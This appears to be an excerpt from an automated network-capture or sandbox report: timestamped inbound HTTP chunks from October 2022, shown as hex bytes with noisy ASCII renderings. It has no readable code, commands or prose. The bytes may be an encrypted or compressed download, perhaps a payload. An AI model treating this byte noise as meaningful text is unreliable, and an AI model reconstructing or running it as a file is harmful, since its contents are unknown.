                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12542INData Raw: 0d dd 11 d9 12 bb f1 a6 11 38 ed de 84 34 9e 81 f5 26 ac 45 58 02 d9 82 9b 76 3b 00 a3 9d 6a 24 e4 3a 93 b3 62 f4 16 0f f8 e7 f1 96 48 43 1c 02 29 70 68 52 10 73 7d 01 25 ed b2 bc 01 20 06 ec 55 65 21 03 ad 03 ac f8 e0 fa 63 ba af f5 40 69 84 cb ff 71 0f 98 d4 1b 80 f9 41 92 0b b4 dd 0a 17 0e c4 1a b1 ec fd 3b 62 9a a2 ef 91 bf f3 d5 12 c0 ae f3 d0 f9 1e e7 96 01 e1 8c ad 9c 0c 1a 05 a5 f7 66 0c a3 a8 f8 66 fb f5 d0 f8 66 b7 ce 1e 16 99 87 0c 9c 1c 99 0c de 60 e0 66 af 4a 0d 1b 99 63 9d d5 13 99 cf f6 c6 eb 66 e7 4d f5 ec 66 57 5e 35 e8 66 3e e1 ea 19 99 88 e7 e7 16 99 77 79 9f 16 99 e3 ba 51 f8 66 03 a8 d3 f2 66 88 1a 2f 0e 99 f2 f6 42 f5 66 8f d9 c3 f9 66 b8 c8 5b 40 4a 3b 5b c8 a5 68 ce fa 6a c5 72 d5 26 9a 14 03 25 1f 45 ec 15 72 0a 37 2e 2b 16 00 8e
                                                                                                                                                                                                                                    Data Ascii: 84&EXv;j$:bHC)phRs}% Ue!c@iqA;bfff`fJcfMfW^5f>wyQff/Bff[@J;[hjr&%Er7.+
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12546INData Raw: ca 3d 9c 23 ef d6 73 fa 66 3e 75 40 fd 66 ff d6 80 f9 66 ce f1 5f 08 99 c0 4f 52 07 99 4f 61 2a 07 99 23 5a e4 e9 66 bb f0 66 e3 66 d8 4a 9a 1f 99 33 d6 f7 e4 66 b7 c9 2f ec 66 f3 ca 3c 14 99 5b f1 0f 13 99 73 5a cf 17 99 52 4d 10 e6 66 5c d3 1d e9 66 a3 ad 65 e9 66 ff a6 ab 07 99 17 ff c5 08 99 9a ce aa bf ca 33 68 82 17 00 0e 2f d8 da 05 30 d9 3d a3 34 e6 f9 fb 72 50 e7 fc 32 4c 99 3e 1f b5 2c 8f 69 0a af 86 b1 0d 00 2e 10 ad 12 e4 8f f6 74 54 f4 eb e2 3f d1 f1 1b 85 84 2a 02 0c 85 af 64 10 76 58 c6 13 ed 7f 21 c6 16 06 41 38 a2 17 03 a8 56 6b ce e0 cf 16 7d 99 f5 85 8c 43 fd ff 5c 12 5f e2 1b 25 6c 86 a4 0b f1 f8 cd 21 0e 39 f0 28 b4 03 8f bf d8 17 5a 6d ec 2c f8 9d 74 7d 2d c0 8a 85 bb d2 57 c8 c3 be 2a 28 12 65 fe d0 47 05 9c 8e da df f1 93 5c c8 87
                                                                                                                                                                                                                                    Data Ascii: =#sf>u@ff_OROa*#ZfffJ3f/f<[sZRMf\fef3h/0=4rP2L>,i.tT?*dvX!A8Vk}C\_%l!9(Zm,t}-W*(eG\
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12550INData Raw: 2e 7b 82 4b 15 d3 81 9d e9 40 45 87 3d f5 9a 9a 86 7d 62 9e 1f 7e b2 ae 79 a0 83 dd d8 43 da 40 be fe f6 27 de a8 de ff 4c 08 b9 78 b2 61 2c 01 c6 6a f1 e4 fa 5d d6 1c e0 1b 46 1d 6c d6 00 bf c6 bf ec 0d da e8 bf 51 48 4f 4e 22 75 41 bc 98 29 cd df 18 6a 56 11 a8 1d 34 96 eb f2 da 97 69 18 2e d3 c8 a9 61 c6 d7 ce e9 7b 99 4f 6b 56 ed 93 39 92 69 e4 28 f5 c0 a9 9d c4 13 65 d6 95 08 ee 3f 16 45 d5 8b 8b 29 59 4b 2f 79 56 8b c4 2a 27 96 89 e6 ed 84 69 1c fa e4 db a9 ab 2a e0 dd e9 6d dd 78 78 56 4f 4f 0e 81 69 de dc 27 d5 e9 00 00 01 00 00 00 b7 8c 61 28 d5 27 a9 fc 66 0e 8b c4 07 99 92 0c 1c 0f 99 2e 77 0f f7 66 e6 4c 3c f0 66 1e 17 fc f4 66 5f 40 23 05 99 79 f6 2e 0a 99 b6 98 56 0a 99 73 cb 98 e4 66 da 71 1a ee 66 c1 33 e6 12 99 02 e7 8b e9 66 e6 58 53 e1
                                                                                                                                                                                                                                    Data Ascii: .{K@E=}b~yC@'Lxa,j]FlQHON"uA)jV4i.a{OkV9i(e?E)YK/yV*'i*mxxVOOi'a('f.wfL<ff_@#y.Vsfqf3fXS
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12553INData Raw: 0a 18 d8 dd 1a cc 7b 11 60 83 4a fe a2 5f 06 08 79 35 fb 9a 60 6b 48 c3 05 fe 8b ed a2 aa 91 c7 4f d8 b6 bc 69 9b 3f d0 09 e4 7b e2 19 02 ac a5 84 ae cc 6f 8c b4 f9 f5 ba 42 69 ed 33 b1 ab d4 74 b5 a0 b0 eb f1 f7 87 ff 4f 6d 9f 65 0a 77 f2 01 31 5f 16 5d 6e c1 3a c0 dc 40 79 03 87 82 ef 65 6b 56 59 22 fd 55 50 61 10 a5 7d 54 7b 28 3d 21 99 82 8f 13 96 bd 86 cf aa fb f8 7a e8 cf 45 b0 7f c0 40 c7 c5 8b 47 37 d6 54 8a 7f 28 9f 92 75 e8 d2 29 97 8d 97 f8 47 d7 77 f8 27 3e a7 7d 60 53 11 75 6f 38 7b cf 6e 96 8f fd 90 4a 92 cf ac 0d 0f 6e e8 39 cb 47 6b c0 ce 39 32 9f 47 c9 80 a3 9e 7f 7e 71 65 61 e8 3c 1f 60 99 97 ce 79 82 24 42 54 d7 9c d1 36 ef 16 41 3f fc ff ff ff 8d 7b 9b c7 50 80 6d 2f a4 ea fb 19 9b ac 07 62 c0 fc 17 09 3d 23 a7 05 70 e2 0c 64 9b 50 97
                                                                                                                                                                                                                                    Data Ascii: {`J_y5`kHOi?{oBi3tOmew1_]n:@yekVY"UPa}T{(=!zE@G7T(u)Gw'>}`Suo8{nJn9Gk92G~qea<`y$BT6A?{Pm/b=#pdP
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12557INData Raw: 2b 40 f8 37 ac c8 bf 1e fc 86 dc bf 3a cb 7d 2f 40 bb 36 fd d3 bf ab d3 c4 d0 bf a0 72 f2 dc bf 74 39 17 27 40 21 f8 66 d7 bf d8 9f 37 25 40 76 df e6 2b 40 4a ff b2 40 40 7f 14 96 89 e9 6d 7b 7b 4c 03 ef 7a 7a 5e 3c f2 3d 6b 14 96 82 ef 65 6b 47 46 22 e0 60 7b 40 59 52 0b fc 87 24 11 f6 07 30 2d 04 b3 fb 17 30 92 fb fe 3f 97 20 8e 0a b8 d0 11 1f 0b 80 ef 28 d9 f4 17 65 c6 dc 0c 68 17 c0 9c f6 07 a0 49 ec fc 9f 24 56 3e ee c7 3c 88 25 17 70 ba ff 01 13 30 c3 62 44 ef 17 56 04 0c ea 3f 01 ee 79 1e b8 1e d7 e8 1f 80 29 ae 2e e0 17 e3 c0 2b 18 68 11 f6 6b e2 07 96 02 55 99 fa 7f 3c 49 54 c9 6f c8 55 c0 fc ff ff ff e7 c8 19 1c 7c 2f 75 24 08 d0 0a a2 cd 04 a2 bc b6 94 76 a7 63 d8 bf fe ff ff ff c1 b7 a1 a8 4d e8 6f f1 17 ea ff 8c aa 05 3a 08 a3 69 9b 72 55 15
                                                                                                                                                                                                                                    Data Ascii: +@7:}/@6rt9'@!f7%@v+@J@@m{{Lzz^<=kekGF"`{@YR$0-0? (ehI$V><%p0bDV?y).+hkU<IToU|/u$vcMo:irU
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12561INData Raw: 08 f0 66 99 90 c8 f4 66 90 8f 17 05 99 9e 11 1a 0a 99 09 07 62 0a 99 8d f4 ac e4 66 dd 16 2e ee 66 86 74 d2 12 99 4d a8 bf e9 66 c1 bf 67 e1 66 54 8c 74 19 99 f5 5f 47 1e 99 15 3c 87 1a 99 84 bb 58 eb 66 da e9 30 e7 66 8a 3b 45 40 4a b3 56 f6 f4 58 61 5c e1 51 55 28 d9 16 a8 24 d8 e0 c1 58 32 8f f5 9b b2 0c eb ff 52 fc 10 f4 1b cb 82 c9 b2 0b 4f 26 82 37 0e 37 f9 39 cc fd 48 11 12 82 ef e2 cc 7b f5 12 73 1d 7b f0 f9 d5 7c 1f f1 fc 9c 22 d6 28 1f ab 72 c0 7f 0a 19 40 fe 1b 00 80 ee e2 04 e4 01 38 3b 42 f4 4d 14 70 c7 f1 2d b3 cb 3c 02 22 bb e0 72 10 d8 51 57 13 12 90 ba b4 38 47 1e fd f7 66 17 9c 7f fd 66 bc 2e 83 01 99 5f ba ee fa 66 8b 15 36 f2 66 57 4e 25 0a 99 d7 7d 16 0d 99 9f 76 d6 09 99 f6 e9 09 f8 66 e8 47 04 f7 66 27 c9 7c f7 66 d3 8a b2 19 99 9b
                                                                                                                                                                                                                                    Data Ascii: ffbf.ftMfgfTt_G<Xf0f;E@JVXa\QU($X2RO&779H{s{|"(r@8;BMp-<"rQW8Gff._f6fWN%}vfGf'|f
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12566INData Raw: 6b 97 77 6e b3 1e 31 80 1a 6e 74 be 23 d3 b7 d6 b4 c5 47 fe 35 c0 c8 cf c1 d4 c7 c9 ea 14 c2 7f e8 c5 3b 87 cf 33 ea 40 25 60 2f 8e 6d f6 9d b8 dd b9 d2 df e0 a5 54 a9 c4 b3 e6 f7 2d c0 05 29 7e a8 4b ba a9 d0 3f 87 15 00 9a 9d f9 91 99 2c 01 00 00 80 03 bc d4 7f 98 f7 83 d3 1f bb f1 3e de 5f a5 f8 f6 29 60 4c 20 38 2a c0 9c 93 dd 23 60 e8 cd 8a d4 3f e4 3f f4 d0 5f c1 92 fa d6 bf d4 15 10 2e 00 77 48 2b d3 df dd 47 93 28 20 aa f1 d0 2f e0 f3 af 6d 22 a0 33 46 a5 d5 9f 82 de 6b d6 3f fa cd 8e df 9f 9a a3 d9 28 c0 9e 41 a7 2c a0 5b d7 fd 1d c5 b2 0a a9 0c c7 ce 5d 04 99 9e a1 82 f5 66 18 97 8f fa 66 17 39 f7 fa 66 5b e2 39 14 99 cb 00 bb 1e 99 70 82 47 e2 66 83 46 2a 19 99 ae d1 f2 11 99 db c2 e1 e9 66 9b 31 d2 ee 66 bb 92 12 ea 66 da c5 cd 1b 99 74 fb c0
                                                                                                                                                                                                                                    Data Ascii: kwn1nt#G5;3@%`/mT-)~K?,>_)`L 8*#`??_.wH+G( /m"3Fk?(A,[]ff9f[9pGfF*f1fft
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12570INData Raw: 26 ba de d9 8a 25 08 64 7c 12 bb 8f c0 b6 08 76 99 46 76 20 08 ec af 64 fa 27 49 2d 97 0c 9c de 6c e6 b7 56 0f d1 d5 5d 2d 08 ec af 64 ec 9a da a0 73 58 9c 3f ad 43 27 e2 15 d1 4a 54 33 6c 30 92 e2 15 f1 e6 bc 79 13 f1 e9 a5 f7 4e 4f b7 94 05 d1 cc f4 de fe 0e 76 2f e4 fd 0e f7 73 4a b1 a4 4d 84 58 ef 24 0d df f7 ec 2f 64 b0 d5 63 b2 a2 fc 66 d9 d2 8a e4 a1 fb 2e 6e 17 6f 15 d1 7e 52 ff ea 2e 97 32 6b 71 f5 de a6 e1 2e a3 ed 42 1d d1 68 85 85 93 57 20 36 eb d4 b1 1f 9d 8b 60 44 74 6c 57 f5 b0 12 a7 2d bf a8 f4 3d 5a 4b e1 8e 9f 99 2b b1 ba 09 6f 12 d1 34 21 45 b1 da 73 51 e2 f8 e7 f2 c6 f7 ec af 65 f4 83 7f ba 45 92 96 35 cd 9a 04 61 1c d1 6e b7 72 e4 2e ce 00 a5 ed 2e 0c 7d 99 d9 8a 21 a7 74 6c 16 1d 3d 5e 60 fa bc 62 34 91 2b 8b 93 ae 86 21 49 31 35 32
                                                                                                                                                                                                                                    Data Ascii: &%d|vFv d'I-lV]-dsX?C'JT3l0yNOv/sJMX$/dcf.no~R.2kq.BhW 6`DtlW-=ZK+o4!EsQeE5anr..}!tl=^`b4+!I152
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12574INData Raw: 20 94 71 b4 8f a4 8f a2 cd 71 4a 33 40 55 28 74 01 73 60 00 88 c3 3e 54 cd ff 1c 5f 17 11 a3 4b b1 8d 11 90 f0 79 0c 21 2b 22 c5 7b 4e d5 1e fc e6 0e 37 ec 3c a8 15 32 a5 e1 69 33 c4 4c b1 e8 51 a9 64 dc 59 7e 41 cf 7b d9 21 89 d1 3e b3 bd 0d 62 1b 2a 40 55 28 74 01 9d ed d4 9f 8c 05 1a d0 19 de 57 91 d0 fd b9 64 13 aa 5b 74 88 5d 74 c8 aa 87 51 23 62 93 f3 95 f7 b1 c5 4b c5 7f 89 e1 b3 8c b4 ef de bf aa d7 8b f9 a7 e8 ba 4a 37 d3 f6 d5 48 f1 25 c3 9e 46 13 1f 34 c6 9f a7 2b e2 01 9e 89 49 da eb e8 2c a0 b2 78 45 b2 af 7d 28 40 55 28 74 06 01 44 99 ee 4e 39 97 ac 0e e2 1e f5 d1 41 70 12 53 b6 91 c9 b1 f1 f1 af ff 1e e4 20 e8 3c 06 56 a0 98 69 9d e6 a8 88 bf 62 89 53 89 72 21 fc 02 d1 fa ff 06 76 42 33 09 fd e7 11 58 6c 40 33 71 bf d3 bf 55 28 74 01 9e 70
                                                                                                                                                                                                                                    Data Ascii: qqJ3@U(ts`>T_Ky!+"{N7<2i3LQdY~A{!>b*@U(tWd[t]tQ#bKJ7H%F4+I,xE}(@U(tDN9ApS <VibSr!vB3Xl@3qU(tp
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12578INData Raw: 2b 2f 46 47 5d 31 00 c1 cf f7 91 04 3b d1 43 72 fb 82 d0 47 d6 b7 c0 cd ff 00 00 fe 80 29 98 cb ff 6c 12 e4 7f 8e a5 97 90 bd b8 d9 c4 d1 6c b5 35 c0 60 b2 e1 91 74 7a 6e e4 e9 1c 85 e9 20 1a 13 cb 61 46 56 d9 0d c1 ff 00 00 fe 7e 34 11 cb ff f3 9b 95 43 5b 6e a9 93 3d f6 22 50 b0 49 7d 39 c0 cd 95 f4 91 7f 6f 3a e6 69 95 d7 36 00 00 00 fd f8 de 12 c4 ff 1a 95 70 db d2 de 2d 69 02 77 2b 74 81 23 c9 ab 4f 16 d2 71 c8 ff 00 00 fd f0 c8 1f c4 ff 4d 91 e1 f3 76 0a b8 8d 0d 3f 34 0d 4f d6 4b 1d ca ff 00 00 fe 80 cc b8 cf ff 0b 33 02 43 a3 38 70 91 1d d5 74 4c 9d 8d 20 9e f9 24 e3 ed e5 14 16 83 fc c4 ff 00 00 fd e0 03 4d c5 ff fa c1 d8 ff 52 d9 12 95 9d db 3c 64 81 69 06 84 40 d6 ea e4 76 1f 56 89 60 c3 ff 00 00 fd d0 51 8f c7 ff 58 03 d5 3e 29 b6 54 e6 a9 e9
                                                                                                                                                                                                                                    Data Ascii: +/FG]1;CrG)ll5`tzn aFV~4C[n="PI}9o:i6p-iw+t#OqMv?4OK3C8ptL $MR<di@vV`QX>)T
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12582INData Raw: f4 26 f4 1d 1e 7c f3 34 11 d8 ff 14 50 1f 0d a5 71 93 7b f0 8c 1d 6e cc 95 c2 0d d9 36 a8 55 5a 24 ab 9f 7e 99 ce a2 df 53 77 6a 07 d9 f3 76 24 a5 99 c0 90 eb 26 f9 52 12 e1 26 da 46 9b e4 26 be 60 eb c1 12 df b1 eb c4 f9 29 a0 8f c5 fc e8 66 46 1c 1f e7 2e 50 4b 0a 15 cc 6e 2f 00 cc a2 72 30 e4 a5 cc ab 76 f4 59 40 e0 f3 f1 39 a7 5b 08 02 d6 8f 70 46 10 8c 82 19 31 ed e5 bb 19 34 06 eb 52 7d 35 03 52 ac b4 ec e0 ad 64 a2 bb f5 e7 ce 9c df ff be f0 80 c0 1b 7f 06 59 86 0b eb 42 32 ff 0e 3d 3b 11 47 18 f1 29 86 3d 34 9b f6 87 7d 0b 77 73 7f b2 bf 1e ae 82 cd 4c 22 d8 84 fd 7b c6 b7 7b c2 30 7b b8 87 2d 2a 7c 69 72 b2 91 ca a3 73 a2 df ad 4a 7c 82 00 5e b7 86 9d a2 0b 21 80 3d 2e 01 fe 81 7d 41 fd 7b 79 b2 15 b4 a6 84 cd ce a0 d0 82 fd 29 54 bf 7d c2 92 19
                                                                                                                                                                                                                                    Data Ascii: &|4Pq{n6UZ$~Swjv$&R&F&`)fF.PKn/r0vY@9[pF14R}5RdYB2=;G)=4}wsL"{{0{-*|irsJ|^!=.}A{y)T}
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12585INData Raw: b1 c5 7f 89 10 3f b2 41 c5 7f 5b b6 dd 52 39 5a d3 fc 34 ec fa 49 70 f8 9e 94 21 c6 73 18 43 21 ce eb 17 8a f9 bf 53 87 e6 b2 1e 75 69 4c 96 b6 b6 29 e6 ba d6 c0 2b 49 83 9e dd 73 2e 5d cf 13 e8 d4 40 97 00 af 80 cf ff ff ff ff ff 50 61 ce 5f cf dc 6a 36 68 0d c5 dc c0 fb ec 1b 88 e6 4f c4 9c 81 25 ce 2d 32 fe 25 38 ac a4 ba 75 b7 d0 67 7c 6a 9e a7 36 c2 dc 08 9b 36 62 cd d5 3f fc ff ff ff 74 03 a8 87 c1 05 dc f1 17 1e ea 3f aa 05 80 0d 10 69 9b 90 28 a6 b6 71 d5 85 c1 ad 02 48 12 21 af 9d 21 27 9d 9a b7 9c 48 a8 bf ea 25 96 b5 4e 4e dd 13 21 df 5b a6 c8 55 6b 53 9c d9 8c 0c e8 1a 0e 6f 57 fa 5b 29 40 94 64 6c 34 f6 4b 8e 27 09 91 50 fd 55 4e 71 52 62 94 b3 cd 67 48 56 17 15 13 c3 14 8c fa 86 09 a5 b4 d2 12 7e 56 8c 6d 2d 26 57 bc 29 2d 82 0f 2f 5b 12 1e
                                                                                                                                                                                                                                    Data Ascii: ?A[R9Z4Ip!sC!SuiL)+Is.]@Pa_j6hO%-2%8ug|j66b?t?i(qH!!'H%NN![UkSoW[)@dl4K'PUNqRbgHV~Vm-&W)-/[
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12589INData Raw: e2 d7 10 31 a1 6b ae 71 68 2e 00 8a 02 7b c8 cf 98 17 b6 7b b4 9d 67 51 7e 03 7b c7 30 ff f6 a7 cb 75 4f 45 f9 9a 2d 72 80 82 e9 55 f4 57 24 09 3d ca 1a 93 af c5 84 80 50 0a 05 97 45 e6 9e 95 dc 5b 1d 72 09 b4 eb a5 25 48 c2 b6 42 64 ee 90 fe 40 76 9d 00 8f fe e8 f3 33 5a 0e 25 1c f9 ec 6f 45 73 fe aa c1 60 fc 0a ab 3d 81 1a 6d ff 6f c1 dd af 2d 06 d0 f4 d4 10 f6 8f e4 2d 88 0f 25 d7 63 2c 60 2c 37 12 47 3b 7f c9 07 02 90 3e 22 51 12 e6 31 d7 e7 e2 68 b4 3c 34 2e d6 6e 88 aa fe a5 f5 b3 1c 48 3e 8a db 05 fc 82 64 95 37 18 dc 45 b5 60 c0 e1 38 5d cc 2b c4 c5 01 77 ba 3d de 9a 51 3b 24 f1 ac cb ff 36 d7 0d 90 c1 dd a7 18 63 9b 63 82 83 05 50 93 b3 ee 0e 0f 0b a1 f7 c4 3d 81 ba 02 fb 6f 3e 22 58 e7 7a d0 9f 08 5c 2e 62 e5 09 cc a9 db f8 f8 24 93 e6 8b 10 6f
                                                                                                                                                                                                                                    Data Ascii: 1kqh.{{gQ~{0uOE-rUW$=PE[r%HBd@v3Z%oEs`=mo--%c,`,7G;>"Q1h<4.nH>d7E`8]+w=Q;$6ccP=o>"Xz\.b$o
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12593INData Raw: ed 66 10 f8 60 e9 66 40 7f bf 18 99 9e f1 b2 17 99 f1 df ca 17 99 55 2c 04 f9 66 45 0e 86 f3 66 96 64 7a 0f 99 f5 10 17 f4 66 41 9b 92 f4 66 fa 99 56 40 4a 2f e0 94 42 e7 3a 1b 2c 82 9a 0a d9 e0 f0 17 a0 4a 60 51 08 d9 44 7d ff 12 07 f2 cd f2 f4 26 9a e3 dd 8d ed cf b0 c3 0d d9 17 09 12 09 f3 11 a7 13 0c d9 90 09 5f 0f 16 b6 90 89 ef 26 bc ec c3 14 f9 3e 6d 73 16 79 ba 17 e0 df 48 57 84 1f d9 7b 1a 65 e5 06 07 5e ac e6 26 72 4a c5 46 c4 36 fc 12 d9 04 29 94 86 2f 79 d3 ee 26 55 71 22 11 f9 af ac 64 18 79 05 35 db 46 6e 1d 9a 18 d9 15 66 21 b9 14 40 61 e6 26 90 9a af d3 82 97 2b 7b 64 a0 87 ba ea 68 ee 9a a6 7c 8a 2b b6 ff 4b 3b 71 8b 09 37 c2 aa 42 db a7 ca 66 7c 25 89 f3 bf 15 5b 95 ec 5b ec a5 4c aa 4b e8 81 07 2f 4e f8 66 bc d4 bd 1f 76 97 9a af 55 9b
                                                                                                                                                                                                                                    Data Ascii: f`f@U,fEfdzfAfV@J/B:,J`QD}&_&>msyHW{e^&rJF6)/y&Uq"dy5Fnf!@a&+{dh|+K;q7Bf|%[[LK/NfvU
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12598INData Raw: 3b cd af 06 f2 3b c1 2b 0d 0a c4 84 da 8a 0a c4 07 25 ea 00 c4 df d1 06 fa 3b a9 eb 20 06 c4 cc aa 08 fa 3b 6a 77 11 dc bf 4a 5e fa d8 c3 8e 64 a1 12 78 46 f9 bb 78 0f 25 b7 46 36 13 af a0 6f 4b 66 a6 36 ce 93 ef 49 3e d0 ad ff c1 21 a9 bd 08 9b 38 a8 5f 12 bc 06 5e 69 f5 22 dd dd a6 d4 86 68 2a d1 4f aa 54 59 ed 5c fa c9 43 87 b3 b1 87 be c9 87 8b 90 97 b4 c2 ea 06 36 6c a3 95 0e 28 52 23 15 11 51 42 dc ef 08 50 a0 66 51 f0 45 84 35 3c 93 17 6a 62 6c 76 7b 01 00 00 10 14 ee 08 c4 11 0f 26 00 c4 7b 99 07 fc 3b 1f 6d 58 ff 3b e3 59 53 07 c4 f6 c0 d4 07 c4 7d ef b4 0d c4 15 53 58 f7 3b eb 81 7e 0b c4 86 70 56 f7 3b b0 e2 81 f1 3b 39 13 b8 f0 3b 3d 03 86 f2 3b 97 0d a7 0e c4 8b f1 f8 0d c4 5f 55 f3 f5 3b fa a4 74 f5 3b 39 3b 14 ff 3b 81 af f8 05 c4 f7 e1 10
                                                                                                                                                                                                                                    Data Ascii: ;;+%; ;jwJ^dxFx%F6oKf6I>!8_^i"h*OTY\C6l(R#QBPfQE5<jblv{&{;mX;YS}SX;~pV;;9;=;_U;t;9;;
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12602INData Raw: f4 e7 8e 75 d5 f1 9f 51 ce 2e 02 20 79 05 80 1a 5c 9a 33 00 58 d7 a0 06 99 67 69 d8 06 99 e3 9a 16 e8 66 fb b0 94 e2 66 88 7a 68 1e 99 13 16 05 e5 66 4f d1 dd ed 66 c3 fa ce 15 99 fb 71 fd 12 99 7b 52 3d 16 99 7a 25 e2 e7 66 64 cb ef e8 66 eb 85 97 e8 66 3f 66 59 06 99 1f b4 db 0c 99 2c de 27 f0 66 5f 9a 4a 0b 99 eb 75 92 03 99 e7 3c 62 01 99 5f 69 a3 bf 4a 8a da a9 80 f2 0c 2f 22 c5 0f b3 26 9b b5 7f 96 12 0a 64 7f 93 f9 44 bd 1b 92 fc c5 6b d2 4b 1f 2a 63 c4 1c 0a 10 59 fa 78 00 51 2f e6 67 e4 80 39 3f 21 f4 34 5d 74 a4 f1 3c 92 cf 5f 02 d3 ca e4 11 10 51 4f 8d 66 ed 20 6e 8d 63 06 16 9f e9 62 03 07 e9 20 bb e0 80 19 36 ec f5 1a 33 08 88 ff 8b b5 14 97 1b ca f3 cd d1 0b 86 38 d9 54 fc b0 55 54 ca 79 6d be c2 f4 24 ac 28 63 2c 65 0b 20 7d 12 3d fb 3f 04
                                                                                                                                                                                                                                    Data Ascii: uQ. y\3XgiffzhfOfq{R=z%fdff?fY,'f_Ju<b_iJ/"&dDkK*cYxQ/g9?!4]t<_QOf ncb 638TUTym$(c,e }=?
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12606INData Raw: 81 7f 11 51 60 24 55 99 dd 75 fe b2 fd 66 ae 5c 4e 01 99 15 d0 23 fa 66 d1 6f fb f2 66 ed f4 e8 0a 99 cd 67 db 0d 99 1d 14 1b 09 99 ac 93 c4 f8 66 0a 85 c9 f7 66 b5 bb b1 f7 66 99 a0 7f 19 99 29 a2 fd 13 99 4b 58 01 ef 66 41 a4 6c 14 99 c5 bb b4 1c 99 b1 a8 a7 e4 66 19 b3 94 e3 66 a1 a8 54 e7 66 38 e2 87 e7 66 83 8c 45 40 4a af f3 af 50 25 18 69 81 dd 3b e9 26 ff 55 e7 25 2e 65 62 0b d9 2a 03 6d 4f 17 4e 30 70 fc 26 07 79 80 df 0f 00 aa f5 0c d9 06 2f fb 73 0b d3 fb 9e f7 26 ec d2 af ba 0b 98 f4 be 0c d9 e1 4b 76 2b 51 4b 03 fc 2a 14 08 47 f8 13 59 ca 7a d6 cd 8d 32 f6 fe 26 69 db da cd ff a4 bc ff 26 f4 3a 23 19 ab 25 9e ba 46 bc 3f 97 c9 14 e3 fd 58 41 9e 05 ed c6 a8 f5 41 75 24 70 f0 26 47 7b d2 ff 14 50 9b 27 9d f3 50 2d 86 52 20 4a cc 74 91 fb 26 69
                                                                                                                                                                                                                                    Data Ascii: Q`$Uuf\N#fofgfff)KXfAlffTf8fE@JP%i;&U%.eb*mON0p&y/s&Kv+QK*GYz2&i&:#%F?XAAu$p&G{P'P-R Jt&i
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12610INData Raw: 04 54 3b de 8e 11 d9 7c e6 01 a3 07 c3 df e7 26 34 0a ef 94 00 c1 41 61 0e d9 11 68 8f a5 09 9a 12 f2 f2 26 4d 04 7c b5 fb 81 6f 7b 0b d9 c8 b6 ea b7 ef 23 36 6a f6 26 e8 19 77 09 f9 ce 1d af 14 59 77 1c 63 54 21 34 b7 f1 26 56 dd 3e e6 31 3a 29 00 25 7c 6b b9 17 e7 76 fa 26 eb e1 7c 8d c4 b1 a5 62 7a 41 c0 47 ce 77 a7 f5 1d 14 89 95 ff 5e df 22 e3 f5 f0 65 ff 26 92 6e dd ff 14 50 9b 27 57 be 67 8c 86 61 f1 b7 9d 50 e1 ff 26 b3 08 40 a7 99 05 8a 1e d9 69 81 3c 00 eb af 64 f8 ef f1 8f 40 d0 f3 33 05 55 7b eb 1e d9 51 37 84 e1 26 55 8f 43 00 4b ba 9b b3 be b6 44 3e f7 b9 02 12 a4 ce c7 1b ea b0 d3 cd 01 57 ae 03 ff 2c 99 dc 33 38 1c 4d ab 9c d0 66 ca ca 14 0e a2 76 a6 3e 9d a0 5c 23 ec cd 6b d8 66 af 60 7a 40 4a 3a 9a a7 77 da 44 29 b3 3a dd 5e f0 37 01 53
                                                                                                                                                                                                                                    Data Ascii: T;|&4Aah&M|o{#6j&wYwcT!4&V>1:)%|kv&|bzAGw^"e&nP'WgaP&@i<d@3U{Q7&UCKD>W,38Mfv>\#kf`z@J:wD):^7S
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12614INData Raw: 48 db c4 28 e7 2a ff e5 cd e6 fa 49 88 f7 89 a6 f5 b3 60 23 40 01 00 00 10 6d 3a c0 28 90 4d f1 e5 15 56 62 a6 4e 55 7d 9a 13 ba 10 c8 3f 12 e3 31 07 1c 66 5a e2 80 62 f7 bf 5f 0a ca 2c 4c cf e8 de 75 a4 46 9a b5 66 ae 68 a2 3d db 38 92 b4 f5 4a 18 7e 06 52 c3 e6 39 40 01 00 00 00 cd 95 d7 28 68 68 43 0a d5 7e 39 40 fe ff ff 8f 1f 79 20 d7 22 bc 13 1a 08 5c 9c 09 57 62 8a b3 f5 20 63 36 40 01 00 00 10 11 16 28 d7 b7 66 1a 1a 3c f1 47 52 ea 6b 34 eb 93 55 e7 58 c2 6f 4a 78 34 21 80 4d 5b 45 9a d7 77 c9 24 0d 01 b0 f5 7f 2d e5 b0 27 e7 a3 a2 37 60 0f 5a 46 0a b6 4c 3c 40 fe ff ff 8f 17 27 25 d7 b2 e9 18 1a 39 8b 37 5b b0 d3 3c e3 e3 d6 0a e5 b7 15 0f 60 c8 e4 7a b9 b9 f5 16 3b a0 a1 52 71 30 75 1a 96 98 d9 c3 25 59 9d f1 ac a0 b4 d8 9e bf f3 c8 89 84 85 44
                                                                                                                                                                                                                                    Data Ascii: H(*I`#@m:(MVbNU}?1fZb_,LuFfh=8J~R9@(hhC~9@y "\Wb c6@(f<GRk4UXoJx4!M[Ew$-'7`ZFL<@'%97[<`z;Rq0u%YD
